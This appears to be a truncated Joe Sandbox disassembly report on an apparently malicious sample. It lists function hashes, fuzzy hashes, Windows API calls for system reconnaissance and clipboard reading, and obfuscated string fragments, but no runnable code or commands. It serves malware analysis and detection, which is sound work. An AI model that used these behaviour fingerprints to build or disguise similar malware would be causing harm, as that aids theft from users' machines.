                                        • Opcode ID: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                        • Instruction ID: 32cb53c941d059e59dbce30d87d00b37379897002de2ab33e1c58f8979392959
                                        • Opcode Fuzzy Hash: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                        • Instruction Fuzzy Hash: 6E910371A087118BE314CF29D89076BF7E2FBC5314F18862DE89597391DB79DC0A8786
                                        APIs
                                        • LdrInitializeThunk.NTDLL(0044523A,?,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
                                        • Instruction ID: 5aabee4b8b26e2ec9a193049fa608abe716db33e51fa934c25155f6b19f8c581
                                        • Opcode Fuzzy Hash: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
                                        • Instruction Fuzzy Hash: AC9115316083018BEB14DF29D86072FB7E2FFC9724F15892DE9C597390D73898158B8A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e23383d503dd4dbdf91b2871d6f5546dc280df0b90b4798c3f127ca15e464351
                                        • Instruction ID: 9ecb6df6af24b1f74966394131ffdcc5ba7ea28be31435c304ffc82d0aba2bdf
                                        • Opcode Fuzzy Hash: e23383d503dd4dbdf91b2871d6f5546dc280df0b90b4798c3f127ca15e464351
                                        • Instruction Fuzzy Hash: 43519D22B457624BD7048A3898802A6BBA3DFD6361F9CC73FC491873D6DB7C980AC345
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43fca39a7f72a1f4448c48acaadee8de276498a9144bd6424f4a2099b91a712c
                                        • Instruction ID: e35f2f60d65f04bb18af1f8d7cf5bd4ec7f66c51464b3c3842bee00e328901c8
                                        • Opcode Fuzzy Hash: 43fca39a7f72a1f4448c48acaadee8de276498a9144bd6424f4a2099b91a712c
                                        • Instruction Fuzzy Hash: 3B51F671A0C6018FD3188B28D59032BB7E2BBC9328F159B2FE4A5573D1D279C946CB4B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                        • Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
                                        • Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                        • Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                        • Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
                                        • Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                        • Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A

                                        Control-flow Graph

                                        APIs
                                        • GetForegroundWindow.USER32 ref: 004423C5
                                        • GetForegroundWindow.USER32 ref: 004423E0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: ForegroundWindow
                                        • String ID:
                                        • API String ID: 2020703349-0
                                        • Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                        • Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
                                        • Opcode Fuzzy Hash: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                        • Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: AllocString
                                        • String ID:
                                        • API String ID: 2525500382-0
                                        • Opcode ID: ef8483e8ab778255dd258931c3d82cf31cc5b03f09e4434ba3215fbb1080e3d0
                                        • Instruction ID: 95046018421402d0801aebd9565f509305716e141edef8233f74c498256fed45
                                        • Opcode Fuzzy Hash: ef8483e8ab778255dd258931c3d82cf31cc5b03f09e4434ba3215fbb1080e3d0
                                        • Instruction Fuzzy Hash: 8F811A20108FC2CED332867C8948747BFD15B27228F484B9DD5E64BBD2D2AAB509C766
                                        APIs
                                        • GetComputerNameExA.KERNELBASE(00000005,D3BAB492,00000100), ref: 0042F301
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: 5f99d4ff4f8377a95cea722d27edd5ab8b31f14781de5b973d5a456a3fa85f19
                                        • Instruction ID: 2bea6ffdc9a5f01b0fb38135ff7c329ec52023607b2de6582bc56e9ec8f1d5ec
                                        • Opcode Fuzzy Hash: 5f99d4ff4f8377a95cea722d27edd5ab8b31f14781de5b973d5a456a3fa85f19
                                        • Instruction Fuzzy Hash: 5A218E3460D3D28BD774CF25D4987EBB7E0AB86304F54896DC4D987281CA75580ACB96
                                        APIs
                                        • GetUserDefaultUILanguage.KERNELBASE ref: 0043B996
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: DefaultLanguageUser
                                        • String ID:
                                        • API String ID: 95929093-0
                                        • Opcode ID: 98e9cfe35c1bf7e059ea3f603ca1750e6c53937badd962860f9777bb0233e5b3
                                        • Instruction ID: 791500818c7a1469a8ddc9d1224b017d77911d2958c513979461ec400309f230
                                        • Opcode Fuzzy Hash: 98e9cfe35c1bf7e059ea3f603ca1750e6c53937badd962860f9777bb0233e5b3
                                        • Instruction Fuzzy Hash: 4B219F71A046418FD714CF38C994B99BBF1AB5A310F0982D9D1A5DB3E2D7388D408F51
                                        APIs
                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040BC80,00000000,00000000), ref: 00442052
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
                                        • Instruction ID: ce4dc6f8cea40f70218e043c946db7baefed7d7f927e290f9bf4e18e7a102a01
                                        • Opcode Fuzzy Hash: ea8428d80ce760913c6091ce044fd24d24df86904107ae5a33981043699a0a50
                                        • Instruction Fuzzy Hash: 95E02B72514210ABF2101F387C05B1736749FC2715F054436F601A3111D739E811C19E
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: BlanketProxy
                                        • String ID:
                                        • API String ID: 3890896728-0
                                        • Opcode ID: 1eee05ed824ab0fad7e0fec43f832c4afae3966b95aa27efb02f9f36988d2f71
                                        • Instruction ID: 81660e69c17f0543e92a0099c1eb05d4904c421e706bb06363d2a5bfa495106c
                                        • Opcode Fuzzy Hash: 1eee05ed824ab0fad7e0fec43f832c4afae3966b95aa27efb02f9f36988d2f71
                                        • Instruction Fuzzy Hash: B9F0B7742497028FD355DF68C5A471BBBE0EF49304F01882CE5A68B290CBB5A948CF82
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: BlanketProxy
                                        • String ID:
                                        • API String ID: 3890896728-0
                                        • Opcode ID: 53b3cb3652385e22ea377a8ab379108a4fc6dc91706275fd2e50ee136dcc3ceb
                                        • Instruction ID: d7c258c8275f3fac7a4ea29dfb35da0c5007ac1f08ebe8bc9e26289c7763600b
                                        • Opcode Fuzzy Hash: 53b3cb3652385e22ea377a8ab379108a4fc6dc91706275fd2e50ee136dcc3ceb
                                        • Instruction Fuzzy Hash: C5F0A5B02087028FE310DF25C5A974FBBE5BB81348F11890DE5A54B291C7FA96898FC6
                                        APIs
                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                        • Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
                                        • Opcode Fuzzy Hash: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                        • Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569
                                        APIs
                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: InitializeSecurity
                                        • String ID:
                                        • API String ID: 640775948-0
                                        • Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                        • Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
                                        • Opcode Fuzzy Hash: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                        • Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C
                                        APIs
                                        • RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                        • Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
                                        • Opcode Fuzzy Hash: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                        • Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8
                                        APIs
                                        • RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                        • Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
                                        • Opcode Fuzzy Hash: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                        • Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
                                        • API String ID: 0-299570860
                                        • Opcode ID: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
                                        • Instruction ID: 11c8b48c8f4a98f758d37e8cd5808665052ec381988852a9cf89f45dba9536ca
                                        • Opcode Fuzzy Hash: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
                                        • Instruction Fuzzy Hash: CF03B07010C7C08AD3259B38C5883EFBFD1AB96314F188A6EE5E9873D2D7798585871B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
                                        • API String ID: 0-1873956536
                                        • Opcode ID: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
                                        • Instruction ID: 931559f782a0dae5da6d3a2348cda9da3af0ea84656c223040a8e2c7efec153d
                                        • Opcode Fuzzy Hash: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
                                        • Instruction Fuzzy Hash: DAB28F3160C7C08BD325DA38C85439FBBD1ABD6324F184A6DE8E98B3C2D6799849C757
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: F;D$zx$'Y<[$(]2_$2U/W$2{<u$3416$3416$6fd$7J0H$7w$:vt$N>_<$SP$Ta\c$Teg$Vt%t$Z[$bxB$qVol$s@qF$wDuJ${HyN$jh$nl$zx
                                        • API String ID: 0-2025997952
                                        • Opcode ID: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
                                        • Instruction ID: 8ebcec6048e81b7414bf2c44ea1e9f7dace67e943cef4cf10300ed7be7304af5
                                        • Opcode Fuzzy Hash: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
                                        • Instruction Fuzzy Hash: D1B273B160C3918BD334CF14D8417ABBBF2FB95304F44892DD4C99B252D7798A4ADB8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pA$)$*$7$>gVf$TW$WH$X2c0$ruA$}&'$
                                        • API String ID: 0-2465278142
                                        • Opcode ID: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
                                        • Instruction ID: db295268db8bdf45a891635b6dee4b286def9570c954afad4e7b9bb962e3f9ad
                                        • Opcode Fuzzy Hash: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
                                        • Instruction Fuzzy Hash: 947211756483528BD324CF28C8917ABBBF1FF95314F18896DE4C58B3A1E7388945CB86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6$6y$EnA$YjM$YjM$fjM$fjM$pSlM$yx$y~${
                                        • API String ID: 0-2342033412
                                        • Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                        • Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
                                        • Opcode Fuzzy Hash: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                        • Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $$&$5$A$J$t
                                        • API String ID: 0-1619763526
                                        • Opcode ID: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
                                        • Instruction ID: a53242e4cf12c94eabb5fc35352f39a952aaa25ff7b8dface19663bb3d57fcdd
                                        • Opcode Fuzzy Hash: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
                                        • Instruction Fuzzy Hash: FB22B07160C7808BC7249B38C5943AFBBE1ABC5324F184A2EE9E9D73C1D77889458B47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 12F5927179D0FDD2822D1F4978021086$EVA^$UJVM$VW$W$]NGD$b$~9$yD
                                        • API String ID: 0-1992629003
                                        • Opcode ID: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
                                        • Instruction ID: ffcda9fbc27d5fd1cec50cde84d534a082da3ff5d4e5b8e77816747385cb8e1d
                                        • Opcode Fuzzy Hash: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
                                        • Instruction Fuzzy Hash: 82E1D1715083808BD724CF24C8947ABBBE2FFD5308F08892DE4D99B392DB798509CB56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                        • API String ID: 0-3323421312
                                        • Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                        • Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
                                        • Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
                                        • Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                        • API String ID: 0-1466227541
                                        • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                        • Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
                                        • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                        • Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A
                                        APIs
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStrings
                                        • String ID: *$*$q
                                        • API String ID: 237503144-4001757600
                                        • Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                        • Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
                                        • Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                        • Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $i|3$)--l$4?!;$6?34$9;#&$?+9&$K
                                        • API String ID: 0-2829372548
                                        • Opcode ID: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                        • Instruction ID: 6807048b151084a9e8e11973f3dfbc4b5eda1ab4f65a555cc9214e5bb2479a1e
                                        • Opcode Fuzzy Hash: 338e6b2548f6942e75dc87549e7f56e2f23b8a97b2fe11a06af31a37ceb72b1f
                                        • Instruction Fuzzy Hash: 2DD1247120C7818BD729CF29C45036BBFE1AB97314F0889AED0D5DB382DA3D8909C756
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                        • String ID:
                                        • API String ID: 1006321803-0
                                        • Opcode ID: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                        • Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
                                        • Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
                                        • Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: >$A$O$f$g$j$q
                                        • API String ID: 0-654885204
                                        • Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                        • Instruction ID: 933c444832a5593444b97503960d5bfec1f1b34db4cd747dab4759e8adc9f3c2
                                        • Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
                                        • Instruction Fuzzy Hash: DAD1F633A0C7D04AD324853C889535BAEC25BE6324F1D8B7EE9F5973C6D66D88068357
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Gt$J[$LUC_$we`k$x}{z$|A
                                        • API String ID: 0-4062276182
                                        • Opcode ID: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
                                        • Instruction ID: f20c1733954f3d7476a331e7578cdc678171662c1333d6829e8b94656b24469a
                                        • Opcode Fuzzy Hash: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
                                        • Instruction Fuzzy Hash: 080200B5A08350CBD3209F25D84176BBBE2FFC6318F454A6DE5C85B390DB799805CB8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: )$)$IDAT$IEND$IHDR
                                        • API String ID: 0-3469842109
                                        • Opcode ID: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
                                        • Instruction ID: 828f2798e7534a509cb653a25c5a447f63e0741c52f375536a6b9b324fae408e
                                        • Opcode Fuzzy Hash: 5f911fd9eadcc5316ebe90ac87000dbf8232f8441ecf4be1dd311271e7b63a2a
                                        • Instruction Fuzzy Hash: 5E02E3B46043808FD700DF29D89075ABBE1EBD6304F05897EEA859B3D1D379D909CB96
                                        APIs
                                        • FreeLibrary.KERNEL32(?), ref: 00419FF7
                                        • FreeLibrary.KERNEL32(?), ref: 0041A039
                                          • Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,?,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                        Strings
